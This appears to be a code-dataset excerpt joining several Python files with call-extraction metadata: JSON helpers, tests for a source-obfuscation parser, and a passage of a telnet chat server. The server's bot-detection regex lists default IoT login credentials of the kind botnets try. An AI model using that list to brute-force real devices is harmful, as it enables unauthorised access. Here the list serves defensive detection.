True, 'import tensorflow as tf\n'), ((3580, 3592), 'tensorflow.square', 'tf.square', (['X'], {}), '(X)\n', (3589, 3592), True, 'import tensorflow as tf\n')]
|
import json
import pathlib
def save_json(obj, path: str):
with open(path, 'w') as f:
json.dump(obj, f)
def load_json(path: str):
with open(path, 'r') as f:
obj = json.load(f)
return obj
def mkdirs_if_not_exist(path, verbose: bool = False):
path = pathlib.Path(path)
if not path.exists():
if verbose:
print(f'directory {path} does not exist. creating...')
path.mkdir(parents=True, exist_ok=True)
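# Round-trip sketch (illustrative, not part of the original module): save a
# dict, load it back, and confirm equality; the temp path is an assumption.
if __name__ == '__main__':
    import os
    import tempfile
    tmp_path = os.path.join(tempfile.mkdtemp(), 'demo.json')
    save_json({'answer': 42}, tmp_path)
    assert load_json(tmp_path) == {'answer': 42}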
|
[
"json.dump",
"pathlib.Path",
"json.load"
] |
[((285, 303), 'pathlib.Path', 'pathlib.Path', (['path'], {}), '(path)\n', (297, 303), False, 'import pathlib\n'), ((99, 116), 'json.dump', 'json.dump', (['obj', 'f'], {}), '(obj, f)\n', (108, 116), False, 'import json\n'), ((190, 202), 'json.load', 'json.load', (['f'], {}), '(f)\n', (199, 202), False, 'import json\n')]
|
import subprocess
if __name__ == '__main__':
subprocess.call("python3 index.py -p /Users/zhouwei/Desktop/python/pythonLearn/gif/test.jpg -t 16 -s 1.25", shell=True)
|
[
"subprocess.call"
] |
[((50, 179), 'subprocess.call', 'subprocess.call', (['"""python3 index.py -p /Users/zhouwei/Desktop/python/pythonLearn/gif/test.jpg -t 16 -s 1.25"""'], {'shell': '(True)'}), "(\n 'python3 index.py -p /Users/zhouwei/Desktop/python/pythonLearn/gif/test.jpg -t 16 -s 1.25'\n , shell=True)\n", (65, 179), False, 'import subprocess\n')]
|
import pytest
from os.path import join
import io
from logic.obfuscatefile import source_statement_gen
def test_get_source_statements(tmpdir):
#
# Create a short source file
#
dir_name = str(tmpdir.mkdir('source'))
source_file = 'app.py'
with io.open(join(dir_name, source_file), 'w') as source:
# Test a python line
source.write(u'from x import y\n')
# Test a lines which continues with a \ --they should be merged
source.write(u'from z import a, \\ \n')
source.write(u'b, \\ \n')
source.write(u'c \n')
# Test a single-line doc string --it should be skipped
source.write(u'"""Single line-doc string with double-quotes."""\n')
source.write(u"'''Single line-doc string with single-quotes.'''\n")
# Test a multi-line doc string --they should be skipped
source.write(u'""" Multi-line \n')
source.write(u'doc string \n')
source.write(u'with double-quotes.\n')
source.write(u'"""\n')
source.write(u"''' Multi-line \n")
source.write(u"doc string \n")
source.write(u"with single-quotes.\n")
source.write(u"'''\n")
# Test comment lines --it should be skipped
source.write(u' # This is a comment\n')
# Test code lines with comments,
# these will not be stripped by statement but rather by transformation
source.write(u' some_func(x) # Comment\n')
# Test skip platform block
source.write(u' # {+android}\n')
source.write(u' android_func(x)\n')
source.write(u' # {-android}\n')
# Keep kivy directives
source.write(u'#: scenario xyz\n')
# Treat line continuation with parens --they should be merged
source.write(u' row = get(\n')
source.write(u' dist_id if dist_id\n')
source.write(u' else var.dist.id)\n')
# Treat lines with parens in quotes --parens should be ignored
source.write(u'this "( should be a complete line("\n')
source.write(u"...as ')' should this')'\n")
# Treat multiline triple-quoted variable strings as strings
source.write(u'x = """ Multi-line \n')
source.write(u'string \n')
source.write(u'with double-quotes.\n')
source.write(u'"""\n') # End with stand-alone quotes
source.write(u"x =''' Multi-line \n")
source.write(u"string \n")
source.write(u"with single-quotes.'''\n") # End with quotes at end
# Treat multiline triple-quoted strings as strings
source.write(u'"""\n')
source.write(u'Multi-line \n')
source.write(u'string \n')
source.write(u'with double-quotes.\n')
source.write(u'"""\n')
source.write(u"'''\n")
source.write(u"Multi-line \n")
source.write(u"string \n")
source.write(u"with single-quotes.'''\n")
#
# Read source file for iOS platform (should skip android lines)
#
get_statement_gen = source_statement_gen(source_file, dir_name,
platform='iOS')
assert get_statement_gen.next() == (u'from x import y', False)
assert get_statement_gen.next() == (u'from z import a, b, c', False)
assert get_statement_gen.next() == \
(u' some_func(x) # Comment', False)
assert get_statement_gen.next() == \
(u'#: scenario xyz', False)
assert get_statement_gen.next() == \
(u' row = get( dist_id if dist_id else var.dist.id)', False)
assert get_statement_gen.next() == \
(u'this "( should be a complete line("', False)
assert get_statement_gen.next() == \
(u"...as ')' should this')'", False)
# Quote variable string
assert get_statement_gen.next() == \
(u'x = """ Multi-line', False)
assert get_statement_gen.next() == \
(u'string', False)
assert get_statement_gen.next() == \
(u'with double-quotes.', False)
assert get_statement_gen.next() == \
(u'"""', False)
assert get_statement_gen.next() == \
(u"x =''' Multi-line", False)
assert get_statement_gen.next() == \
(u"string", False)
assert get_statement_gen.next() == \
(u"with single-quotes.'''", False)
# Quote string
assert get_statement_gen.next() == \
(u'"""', True)
assert get_statement_gen.next() == \
(u'Multi-line', True)
assert get_statement_gen.next() == \
(u'string', True)
assert get_statement_gen.next() == \
(u'with double-quotes.', True)
assert get_statement_gen.next() == \
(u'"""', True)
assert get_statement_gen.next() == \
(u"'''", True)
assert get_statement_gen.next() == \
(u"Multi-line", True)
assert get_statement_gen.next() == \
(u"string", True)
assert get_statement_gen.next() == \
(u"with single-quotes.'''", True)
with pytest.raises(StopIteration):
assert get_statement_gen.next()
#
# Read source file for android platform (should include android lines)
#
get_statement_gen = source_statement_gen(
source_file, dir_name, platform='android')
assert get_statement_gen.next() == (u'from x import y', False)
assert get_statement_gen.next() == (u'from z import a, b, c', False)
assert get_statement_gen.next() == \
(u' some_func(x) # Comment', False)
assert get_statement_gen.next() == \
(u' android_func(x)', False)
assert get_statement_gen.next() == \
(u'#: scenario xyz', False)
assert get_statement_gen.next() == \
(u' row = get( dist_id if dist_id else var.dist.id)', False)
assert get_statement_gen.next() == \
(u'this "( should be a complete line("', False)
assert get_statement_gen.next() == \
(u"...as ')' should this')'", False)
# Quote variable string
assert get_statement_gen.next() == \
(u'x = """ Multi-line', False)
assert get_statement_gen.next() == \
(u'string', False)
assert get_statement_gen.next() == \
(u'with double-quotes.', False)
assert get_statement_gen.next() == \
(u'"""', False)
assert get_statement_gen.next() == \
(u"x =''' Multi-line", False)
assert get_statement_gen.next() == \
(u"string", False)
assert get_statement_gen.next() == \
(u"with single-quotes.'''", False)
# Quote string
assert get_statement_gen.next() == \
(u'"""', True)
assert get_statement_gen.next() == \
(u'Multi-line', True)
assert get_statement_gen.next() == \
(u'string', True)
assert get_statement_gen.next() == \
(u'with double-quotes.', True)
assert get_statement_gen.next() == \
(u'"""', True)
assert get_statement_gen.next() == \
(u"'''", True)
assert get_statement_gen.next() == \
(u"Multi-line", True)
assert get_statement_gen.next() == \
(u"string", True)
assert get_statement_gen.next() == \
(u"with single-quotes.'''", True)
with pytest.raises(StopIteration):
get_statement_gen.next()
#
# Read source file for default platform (should include android lines)
#
get_statement_gen = source_statement_gen(
source_file, dir_name)
assert get_statement_gen.next() == (u'from x import y', False)
assert get_statement_gen.next() == (u'from z import a, b, c', False)
assert get_statement_gen.next() == \
(u' some_func(x) # Comment', False)
assert get_statement_gen.next() == \
(u' android_func(x)', False)
assert get_statement_gen.next() == \
(u'#: scenario xyz', False)
assert get_statement_gen.next() == \
(u' row = get( dist_id if dist_id else var.dist.id)', False)
assert get_statement_gen.next() == \
(u'this "( should be a complete line("', False)
assert get_statement_gen.next() == \
(u"...as ')' should this')'", False)
# Quote variable string
assert get_statement_gen.next() == \
(u'x = """ Multi-line', False)
assert get_statement_gen.next() == \
(u'string', False)
assert get_statement_gen.next() == \
(u'with double-quotes.', False)
assert get_statement_gen.next() == \
(u'"""', False)
assert get_statement_gen.next() == \
(u"x =''' Multi-line", False)
assert get_statement_gen.next() == \
(u"string", False)
assert get_statement_gen.next() == \
(u"with single-quotes.'''", False)
# Quote string
assert get_statement_gen.next() == \
(u'"""', True)
assert get_statement_gen.next() == \
(u'Multi-line', True)
assert get_statement_gen.next() == \
(u'string', True)
assert get_statement_gen.next() == \
(u'with double-quotes.', True)
assert get_statement_gen.next() == \
(u'"""', True)
assert get_statement_gen.next() == \
(u"'''", True)
assert get_statement_gen.next() == \
(u"Multi-line", True)
assert get_statement_gen.next() == \
(u"string", True)
assert get_statement_gen.next() == \
(u"with single-quotes.'''", True)
with pytest.raises(StopIteration):
get_statement_gen.next()
def test_get_source_statements_multiple_parens(tmpdir):
dir_name = str(tmpdir.mkdir('source'))
source_file = 'app.py'
# Test with adjacent single quotes
with io.open(join(dir_name, source_file), 'w') as source:
# Test a python line
source.write(u"class ValidationError(Exception):\n")
source.write(u"def __init__(self, message='', title=_('Error')):\n")
source.write(u"self.message = message\n")
source.write(u"self.title = title\n")
get_statement_gen = source_statement_gen(
source_file, dir_name)
assert get_statement_gen.next() == (
u"class ValidationError(Exception):", False)
assert get_statement_gen.next() == (
u"def __init__(self, message='', title=_('Error')):", False)
assert get_statement_gen.next() == (u"self.message = message", False)
assert get_statement_gen.next() == (u"self.title = title", False)
# Test with quoted parens
with io.open(join(dir_name, source_file), 'w') as source:
# Test a python line
source.write(u"self.lpar = Literal('(').suppress()\n")
source.write(u"self.rpar = Literal(')').suppress()\n")
get_statement_gen = source_statement_gen(source_file, dir_name)
assert get_statement_gen.next() == (
u"self.lpar = Literal('(').suppress()", False)
assert get_statement_gen.next() == (
u"self.rpar = Literal(')').suppress()", False)
with pytest.raises(StopIteration):
get_statement_gen.next()
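# Contract exercised throughout this file (inferred from the assertions above,
# not from upstream docs): each next() yields a (statement_text, in_docstring)
# tuple, where the flag is True only inside free-standing triple-quoted blocks,
# never for triple-quoted strings assigned to a variable.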
|
[
"pytest.raises",
"os.path.join",
"logic.obfuscatefile.source_statement_gen"
] |
[((3041, 3100), 'logic.obfuscatefile.source_statement_gen', 'source_statement_gen', (['source_file', 'dir_name'], {'platform': '"""iOS"""'}), "(source_file, dir_name, platform='iOS')\n", (3061, 3100), False, 'from logic.obfuscatefile import source_statement_gen\n'), ((5146, 5209), 'logic.obfuscatefile.source_statement_gen', 'source_statement_gen', (['source_file', 'dir_name'], {'platform': '"""android"""'}), "(source_file, dir_name, platform='android')\n", (5166, 5209), False, 'from logic.obfuscatefile import source_statement_gen\n'), ((7294, 7337), 'logic.obfuscatefile.source_statement_gen', 'source_statement_gen', (['source_file', 'dir_name'], {}), '(source_file, dir_name)\n', (7314, 7337), False, 'from logic.obfuscatefile import source_statement_gen\n'), ((9891, 9934), 'logic.obfuscatefile.source_statement_gen', 'source_statement_gen', (['source_file', 'dir_name'], {}), '(source_file, dir_name)\n', (9911, 9934), False, 'from logic.obfuscatefile import source_statement_gen\n'), ((10564, 10607), 'logic.obfuscatefile.source_statement_gen', 'source_statement_gen', (['source_file', 'dir_name'], {}), '(source_file, dir_name)\n', (10584, 10607), False, 'from logic.obfuscatefile import source_statement_gen\n'), ((4964, 4992), 'pytest.raises', 'pytest.raises', (['StopIteration'], {}), '(StopIteration)\n', (4977, 4992), False, 'import pytest\n'), ((7118, 7146), 'pytest.raises', 'pytest.raises', (['StopIteration'], {}), '(StopIteration)\n', (7131, 7146), False, 'import pytest\n'), ((9312, 9340), 'pytest.raises', 'pytest.raises', (['StopIteration'], {}), '(StopIteration)\n', (9325, 9340), False, 'import pytest\n'), ((10809, 10837), 'pytest.raises', 'pytest.raises', (['StopIteration'], {}), '(StopIteration)\n', (10822, 10837), False, 'import pytest\n'), ((276, 303), 'os.path.join', 'join', (['dir_name', 'source_file'], {}), '(dir_name, source_file)\n', (280, 303), False, 'from os.path import join\n'), ((9559, 9586), 'os.path.join', 'join', (['dir_name', 'source_file'], {}), '(dir_name, source_file)\n', (9563, 9586), False, 'from os.path import join\n'), ((10340, 10367), 'os.path.join', 'join', (['dir_name', 'source_file'], {}), '(dir_name, source_file)\n', (10344, 10367), False, 'from os.path import join\n')]
|
# coding: utf-8
from __future__ import print_function
from .__init__ import EP, PY2, COLORS, IRONPY, unicode
from . import util as Util
from . import chat as Chat
from . import user as User
import os
import re
import time
import zlib
import socket
import threading
import binascii
from datetime import datetime
import operator
print = Util.print
if PY2:
from Queue import Queue
else:
from queue import Queue
class VT100_Server(object):
def __init__(self, host, port, world, other_if):
self.ar = world.ar
self.other_if = other_if
self.world = world
self.clients = []
self.user_config = {}
self.user_config_path = None
self.user_config_changed = False
self.re_bot = re.compile(
"root|Admin|admin|default|support|user|password|telnet|"
+ "guest|operator|supervisor|daemon|service|enable|system|"
+ "manager|baby|netman|telecom|volition|davox|sysadm|busybox|"
+ "tech|888888|666666|mg3500|merlin|nmspw|super|setup|vizxv|"
+ "HTTP/1|222222|xxyyzz|synnet|PlcmSpIp|Glo|e8ehome|xc3511|"
+ "taZz@|aquario|1001chin|Oxhlw|S2fGq|Zte521|ttnet|tlJwp|"
+ "t0tal|gpon|anko|changeme|hi3518|antslq|juantech|zlxx|"
+ "xmhdipc|ipcam|cat10|synnet|ezdvr|vstarcam|klv123|"
+ "ubnt|hunt57|Alphanet|epicrout|annie20|realtek|netscreen"
)
self.scheduled_kicks = []
self.next_scheduled_kick = None
self.ep = (host, port)
self.srv_sck = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.srv_sck.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.srv_sck.bind(self.ep)
self.srv_sck.listen(1)
if IRONPY:
self.__eq__ = self.ipy__eq__
self.__ne__ = self.ipy__ne__
def ipy__eq__(self, other):
return id(self) == id(other)
def ipy__ne__(self, other):
return id(self) != id(other)
def con(self, msg, adr, add=0):
ht = time.strftime("%d/%m/%Y, %H:%M:%S")
print(
" {0} {1} {2} {3} :{4}".format(
msg, ht, len(self.clients) + add, adr[0], adr[1]
)
)
def gen_remote(self, socket, addr, usr):
raise RuntimeError("inherit me")
def handle_error(self):
Util.whoops()
def handle_accept(self):
with self.world.mutex:
# https://github.com/9001/r0c/issues/1
# self.addr becomes None when a client disconnects,
# and socket.getpeername()[0] will raise exceptions
#
# smoke test:
# yes 127.0.0.1 | nmap -v -iL - -Pn -sT -p 2323,1531 -T 5
try:
socket, addr = self.srv_sck.accept()
adr = [addr[0], addr[1]]
if len(socket.getpeername()[0]) < 3:
raise Exception
except:
print("[!] handshake error (probably a port scanner)")
return
usr = User.User(self.world, adr)
remote = self.gen_remote(socket, adr, usr)
self.world.add_user(usr)
self.clients.append(remote)
self.world.cserial += 1
remote.conf_wizard(0)
kick_msg = " wizardkick: {0} {1}".format(remote.user.nick, remote.adr[0])
self.schedule_kick(remote, 600, kick_msg)
print(
"client join: {0} {2} {3} {1}".format(
remote.user.nick, len(self.clients), *list(remote.adr)
)
)
def part(self, remote, announce=True):
# TODO should probably set this inside the lock? check if that's safe
remote.dead = True
with self.world.mutex:
# Util.whoops("client part")
try:
remote.socket.shutdown(socket.SHUT_RDWR)
remote.socket.close()
except:
pass
if announce:
print(
"client part: {0} {2} {3} {1}".format(
remote.user.nick, len(self.clients) - 1, *list(remote.adr)
)
)
self.clients.remove(remote)
self.world.cserial += 1
try:
remote.user.active_chan = None
remote.user.old_active_chan = None
remote.user.new_active_chan = None
except:
pass
for uchan in list(remote.user.chans):
self.world.part_chan(uchan)
if remote.user and remote.user in self.world.users:
self.world.users.remove(remote.user)
if remote.wire_log is not None:
remote.wire_log.write(
"{0:.0f}\n".format(time.time() * 1000).encode("utf-8")
)
remote.wire_log.close()
def schedule_kick(self, remote, timeout, msg=None):
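        # `timeout` arrives as a relative delay in seconds and is turned into
        # an absolute epoch deadline before being queued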
timeout += time.time()
self.scheduled_kicks.append([timeout, remote, msg])
if self.next_scheduled_kick is None or self.next_scheduled_kick > timeout:
self.next_scheduled_kick = timeout
def unschedule_kick(self, remote):
self.scheduled_kicks = [x for x in self.scheduled_kicks if x[1] != remote]
def load_configs(self):
with self.world.mutex:
if not self.user_config_path:
raise RuntimeError("inheritance bug: self.user_config_path not set")
self.user_config = {}
self.user_config_changed = False
if not os.path.isfile(self.user_config_path):
print(" * {0} knows 0 clients".format(self.__class__.__name__))
return
panic = False
with open(self.user_config_path, "rb") as f:
f.readline() # discard version info
try:
for ln in [x.decode("utf-8").strip() for x in f]:
k, v = ln.split(u" ", 1)
self.user_config[k] = v
except:
print(" /!\\ invalid config line")
try:
print(ln)
except:
pass
if panic:
raise RuntimeError("see above")
print(
" * {0} knows {1} clients".format(
self.__class__.__name__, len(self.user_config)
)
)
def save_configs(self):
with self.world.mutex:
if not self.user_config_changed:
return
self.user_config_changed = False
with open(self.user_config_path, "wb") as f:
f.write("1\n".encode("utf-8"))
for k, v in sorted(self.user_config.items()):
f.write((u" ".join([k, v]) + u"\n").encode("utf-8"))
print(
" * {0} saved {1} client configs".format(
self.__class__.__name__, len(self.user_config)
)
)
class VT100_Client(object):
def __init__(self, host, socket, address, world, usr):
self.ar = world.ar
self.host = host
self.socket = socket
self.adr = address
self.world = world
self.user = usr
self.dead = False # set true at disconnect
self.is_bot = False
self.wire_log = None
if self.ar.log_rx or self.ar.log_tx:
log_fn = "{0}wire/{1}_{2}_{3}".format(
EP.log, int(time.time()), *list(self.adr)
)
while os.path.isfile(log_fn):
log_fn += "_"
self.wire_log = open(log_fn, "wb")
self.wire_log.write("{0:.0f}\n".format(time.time() * 1000).encode("utf-8"))
self.uee_offset = 0
try:
x = b"\xfe"
x.decode("utf-8")
except UnicodeDecodeError as uee:
self.uee_offset = -uee.start
# outgoing data
self.outbox = Queue()
self.replies = Queue()
self.last_tx = None
# incoming data
self.backlog = b""
self.in_bytes = b""
self.in_text = u""
self.in_text_full = u""
self.num_telnet_negotiations = 0
self.slowmo_tx = 0
self.slowmo_skips = 0 # remaining cycles to skip
self.set_codec("utf-8")
# incoming requests
self.scroll_cmd = None
self.scroll_i = None
self.scroll_f = 1
# input buffer
self.linebuf = u""
self.linepos = 0
self.lineview = 0
self.msg_hist = []
self.msg_hist_n = None
self.msg_not_from_hist = False
self.left_chrome = u""
# tabcomplete registers
self.tc_nicks = None
self.tc_msg_pre = None
self.tc_msg_post = None
# state registers
self.wizard_stage = "start"
self.wizard_lastlen = 0
self.wizard_maxdelta = 0
self.wizard_mindelta = 9001
self.iface_confirmed = False
self.handshake_sz = False
self.handshake_world = False
self.show_hilight_tutorial = True
self.need_full_redraw = False
self.too_small = False
self.screen = []
self.w = 80
self.h = 24
self.pending_size_request = False
self.size_request_action = None
self.re_cursor_pos = re.compile(r"\033\[([0-9]{1,4});([0-9]{1,4})R")
self.msg_too_small = [
u"your screen is too small",
u"screen is too small",
u"screen too small",
u"screen 2 small",
u"scrn 2 small",
u"too small",
u"2 small",
u"2 smol",
u"2smol",
u":(",
]
self.codec_map = [
"utf-8",
0,
"cp437",
0,
"shift_jis",
0,
"latin1",
1,
"ascii",
2,
]
self.codec_uni = [u"├┐ ┌┬┐ ┌ ", u"Ð Ñ Ã ", u"all the above are messed up "]
self.codec_asc = [u"hmr", u"DNA", u"n/a"]
self.esc_tab = {}
self.add_esc(u"\x1b\x5bD", "cl")
self.add_esc(u"\x1b\x5bC", "cr")
self.add_esc(u"\x1b\x5bA", "cu")
self.add_esc(u"\x1b\x5bB", "cd")
self.add_esc(u"\x1b\x5b\x31\x7e", "home")
self.add_esc(u"\x1b\x5b\x34\x7e", "end")
self.add_esc(u"\x1b\x5b\x35\x7e", "pgup")
self.add_esc(u"\x1b\x5b\x36\x7e", "pgdn")
self.add_esc(u"\x08", "bs")
self.add_esc(u"\x09", "tab")
self.add_esc(u"\x0d\x0a", "ret")
self.add_esc(u"\x0d\x00", "ret")
# inetutils-1.9.4
self.add_esc(u"\x7f", "bs") # this is DEL on windows-telnet
self.add_esc(u"\x1b\x4f\x48", "home")
self.add_esc(u"\x1b\x4f\x46", "end")
# debian 9.3
self.add_esc(u"\x1b\x5b\x48", "home")
self.add_esc(u"\x1b\x5b\x46", "end")
# putty
self.add_esc(u"\x1b\x5b\x33\x7e", "del")
# hotkeys
self.add_esc(u"\x12", "redraw")
self.add_esc(u"\x01", "prev-chan")
self.add_esc(u"\x18", "next-chan")
self.add_esc(u"\x05", "alt-tab")
thr = threading.Thread(target=self.handshake_timeout, name="hs_to")
thr.daemon = True
thr.start()
if IRONPY:
self.__eq__ = self.ipy__eq__
self.__ne__ = self.ipy__ne__
def ipy__eq__(self, other):
return id(self) == id(other)
def ipy__ne__(self, other):
return id(self) != id(other)
def default_config(self):
self.slowmo_tx = 0
self.y_input = 0 # offset from bottom of screen
self.y_status = 1 # offset from bottom of screen
self.linemode = False # set true by buggy clients
self.echo_on = False # set true by buffy clients
self.vt100 = True # set nope by butty clients
self.cnicks = False # colored nicknames
self.align = True # fixed left margin
self.bell = True # doot on hilights
self.crlf = u"\n" # return key
self.set_codec("utf-8")
def load_config(self):
load_ok = False
with self.world.mutex:
self.default_config()
self.user.client = self
self.user.admin = self.adr[0] == "127.0.0.1" # TODO
try:
(
ts,
nick,
slowmo,
linemode,
vt100,
echo_on,
crlf,
codec,
bell,
cnicks,
align,
) = self.host.user_config[self.adr[0]].split(u" ")
# print('],['.join([nick,linemode,vt100,echo_on,codec,bell]))
# terminal behavior
self.slowmo_tx = int(slowmo)
self.linemode = 1 == int(linemode)
self.vt100 = 1 == int(vt100)
self.echo_on = 1 == int(echo_on)
self.crlf = binascii.unhexlify(crlf).decode("utf-8")
self.set_codec(codec)
# user config
self.bell = 1 == int(bell)
self.cnicks = 1 == int(cnicks)
self.align = 1 == int(align)
if not self.world.find_user(nick):
self.user.set_nick(nick)
load_ok = True
except:
self.default_config()
if self.echo_on:
# if echo enabled, swap status and input:
# that way the screen won't scroll on enter
self.y_input = 1
self.y_status = 0
if not self.user.nick:
self.user.set_rand_nick()
return load_ok
def save_config(self):
with self.world.mutex:
conf_str = u" ".join(
[
hex(int(time.time() * 8.0))[2:].rstrip("L"),
self.user.nick,
# terminal behavior
unicode(self.slowmo_tx),
u"1" if self.linemode else u"0",
u"1" if self.vt100 else u"0",
u"1" if self.echo_on else u"0",
binascii.hexlify(self.crlf.encode("utf-8")).decode("utf-8"),
self.codec,
# user config
u"1" if self.bell else u"0",
u"1" if self.cnicks else u"0",
u"1" if self.align else u"0",
]
)
try:
if self.host.user_config[self.adr[0]] == conf_str:
return
except:
pass
self.host.user_config[self.adr[0]] = conf_str
self.host.user_config_changed = True
if self.echo_on:
self.y_input = 1
self.y_status = 0
def set_codec(self, codec_name):
multibyte = ["utf-8", "shift_jis"]
ff_illegal = ["utf-8", "shift_jis"]
self.codec = codec_name
self.multibyte_codec = self.codec in multibyte
self.inband_will_fail_decode = self.codec in ff_illegal
def reassign_retkey(self, crlf):
etab = self.esc_tab.iteritems if PY2 else self.esc_tab.items
drop = []
for key, value in etab():
if value == "ret" and key != u"\x0d\x00":
# \x0d \x00 gets special treatment because
# putty sends it for pastes but not keystrokes
# and it's unique enough to not cause any issues
drop.append(key)
for key in drop:
del self.esc_tab[key]
self.crlf = crlf
self.esc_tab[self.crlf] = "ret"
def determine_retkey(self, verify_only=False):
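        # scan the received text for the first run of CR/LF/NUL bytes; returns
        # None if none seen yet, a bool when verify_only, else the run's index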
nline = b"\x0d\x0a\x00"
btext = self.in_text.encode("utf-8")
nl_a = next((i for i, ch in enumerate(btext) if ch in nline), None)
if nl_a is None:
return None
nl_b = None
for i, ch in enumerate(btext[nl_a:], nl_a):
if ch not in nline:
break
nl_b = i
if nl_b is not None:
nl = btext[nl_a : nl_b + 1]
crlf = nl.decode("utf-8")
if verify_only:
return self.crlf == crlf
self.reassign_retkey(crlf)
print(
"client crlf: {0} {1} {2}".format(
self.user.nick, self.adr[0], Util.b2hex(nl)
)
)
return nl_a
def set_term_size(self, w, h):
self.w = w
self.h = h
if self.ar.dbg:
print("terminal sz: {0}x{1}".format(self.w, self.h))
if self.w >= 512:
print("screen width {0} reduced to 80".format(self.w))
self.w = 80
if self.h >= 512:
print("screen height {0} reduced to 24".format(self.h))
self.h = 24
self.user.nick_len = len(self.user.nick)
if self.user.nick_len > self.w * 0.25:
self.user.nick_len = int(self.w * 0.25)
self.handshake_sz = True
def handshake_timeout(self):
if self.ar.dbg:
print("handshake_sz init")
time.sleep(1)
if self.ar.dbg:
if self.handshake_sz:
print("handshake_sz timeout")
else:
print("handshake_sz ok")
self.handshake_sz = True
def add_esc(self, key, act):
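        # register every proper prefix of `key` as False so the input parser can
        # distinguish "incomplete escape so far" from "unknown sequence", then
        # map the full sequence to its action name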
hist = u""
for c in key:
hist += c
if hist == key:
break
if hist in self.esc_tab and self.esc_tab[hist]:
raise RuntimeError(
"partial escape code [{0}] matching fully defined escape code for [{1}]".format(
Util.b2hex(hist), act
)
)
self.esc_tab[hist] = False
if key in self.esc_tab and self.esc_tab[key] != act:
raise RuntimeError(
"fully defined escape code [{0}] for [{1}] matches other escape code for [{2}]".format(
Util.b2hex(key), act, self.esc_tab[key]
)
)
self.esc_tab[key] = act
def request_terminal_size(self, scheduled_task=None):
if not self.vt100 or self.num_telnet_negotiations > 0:
# telnet got this covered,
# non-vt100 can't be helped
return False
self.pending_size_request = True
self.size_request_action = scheduled_task
self.say(b"\033[s\033[999;999H\033[6n\033[u")
if self.linemode:
self.say(
b"\033[H\033[J\r\n *** please press ENTER (due to linemode) ***\r\n\r\n "
)
def say(self, message):
self.outbox.put(message)
def readable(self):
return not self.dead
def writable(self):
# if not self.replies.empty() or self.backlog:
# print('REPLY!!')
# else:
# print('@' if self.backlog or not self.replies.empty() or not self.outbox.empty() else '.', end='')
# sys.stdout.flush()
# if self.slowmo_tx:
# #print('x')
# now = time.time()
# if self.last_tx is not None and now - self.last_tx < 0.01:
# return False
# #print('ooo')
# looks like we might end up here after all,
# TODO: safeguard against similar issues (thanks asyncore)
try:
return not self.dead and (
self.backlog or not self.replies.empty() or not self.outbox.empty()
)
except:
# terrible print-once guard
try:
self.crash_case_1 += 1
except:
self.crash_case_1 = 1
Util.whoops()
if not self.dead:
self.host.part(self)
def handle_close(self):
if not self.dead:
self.host.part(self)
def handle_error(self):
Util.whoops()
if not self.dead:
self.host.part(self)
def handle_write(self):
if not self.writable():
return
msg = self.backlog
self.backlog = b""
for src in [self.replies, self.outbox]:
while len(msg) < 480 and not src.empty():
msg += src.get()
if self.ar.hex_tx:
if len(msg) < self.ar.hex_lim:
Util.hexdump(msg, "<<--")
else:
print("<<-- : [{0} byte]".format(len(msg)))
if self.wire_log and self.ar.log_tx:
self.wire_log.write("{0:.0f}\n".format(time.time() * 1000).encode("utf-8"))
Util.hexdump(msg, "<", self.wire_log)
if self.slowmo_tx:
end_pos = next(
(
i
for i, ch in enumerate(msg)
if i >= 510 or (i > 480 and ch in [b" "[0], b"\033"[0]])
),
len(msg),
)
self.backlog = msg[end_pos:]
sent = self.socket.send(msg[:end_pos])
self.backlog = msg[sent:]
self.slowmo_skips = self.slowmo_tx
# hexdump(msg[:sent])
# print('@@@ sent = {0} backlog = {1}'.format(sent, len(self.backlog)))
else:
sent = self.socket.send(msg)
self.backlog = msg[sent:]
# print('@@@ sent = {0} backlog = {1}'.format(sent, len(self.backlog)))
def refresh(self, cursor_moved):
"""compose necessary ansi text and send to client"""
with self.world.mutex:
if (
self.too_small
or not self.handshake_sz
or not self.handshake_world
or self.wizard_stage is not None
):
return
if self.dead:
Util.whoops("refreshing dead client #wow #whoa")
try:
print("*** i am {0}".format(self.adr))
except:
pass
try:
print("*** i am [{0}]".format(self.user.nick))
except:
pass
if self in self.host.clients:
print("*** dead client still in host.clients")
def delayed_drop():
time.sleep(5)
if self in self.host.clients:
print("*** dead client STILL in host.clients, removing")
self.host.clients.remove(self)
self.world.cserial += 1
else:
print("*** its fine")
thr = threading.Thread(target=delayed_drop, name="dropcli")
thr.daemon = True
thr.start()
return
if not self.user:
Util.whoops("how did you get here without a user?")
return
if not self.user.active_chan and not self.user.new_active_chan:
Util.whoops(
"how did you get here without a chan? {0} {1}".format(
self.user.active_chan, self.user.new_active_chan
)
)
return
# full redraw if requested by anything stateful
full_redraw = self.need_full_redraw
self.need_full_redraw = False
# full redraw if the screen buffer has been invalidated
if not self.screen or len(self.screen) != self.h:
full_redraw = True
status_changed = False # set true to force status bar update
scroll_performed = False # scroll events might affect status bar
# switch to new channel,
# storing the last viewed message for notification purposes
if self.user.new_active_chan:
if self.user.active_chan:
self.user.active_chan.update_activity_flags(True)
self.user.old_active_chan = self.user.active_chan
self.user.active_chan = self.user.new_active_chan
self.user.active_chan.update_activity_flags(True)
self.user.new_active_chan = None
full_redraw = True
# check if user input has caused any unread messages
# in the active channel to be considered read
elif cursor_moved or self.scroll_cmd:
status_changed = self.user.active_chan.update_activity_flags(True)
if self.scroll_cmd:
# we don't know which messages will be displayed yet,
# schedule a recheck after message processing
scroll_performed = True
to_send = u""
fix_color = False
# invalidate screen buffer if full redraw
if full_redraw:
self.screen = ["x"] * self.h
if not self.vt100:
to_send = u"\r\n" * self.h
mark_messages_read = (
status_changed and not self.user.active_chan.display_notification
)
# update chat view
to_send += self.update_chat_view(full_redraw, mark_messages_read)
if to_send:
full_redraw = True
# update_chat_view computes which messages are visible
# once a scroll has completed, so we have to redo this
if scroll_performed:
if self.user.active_chan.update_activity_flags(True):
status_changed = True
if self.vt100:
# update top bar
to_send += self.update_top_bar(full_redraw)
# update status bar
if status_changed or not cursor_moved:
to_send += self.update_status_bar(full_redraw)
# anything sent so far would require an SGR reset
if to_send:
fix_color = True
else:
# always clear and resend the status bar for non-vt100
to_send += "\r" + (" " * 78) + "\r"
to_send += self.update_status_bar(True)
# handle keyboard strokes from non-linemode clients,
# but redraw text input field for linemode clients
to_send += self.update_text_input(full_redraw or self.echo_on)
# reset colours if necessary
if u"\033[" in self.linebuf or fix_color:
to_send += u"\033[0m"
# position cursor after CLeft/CRight/Home/End
if self.vt100 and (to_send or cursor_moved):
to_send += u"\033[{0};{1}H".format(
self.h - self.y_input,
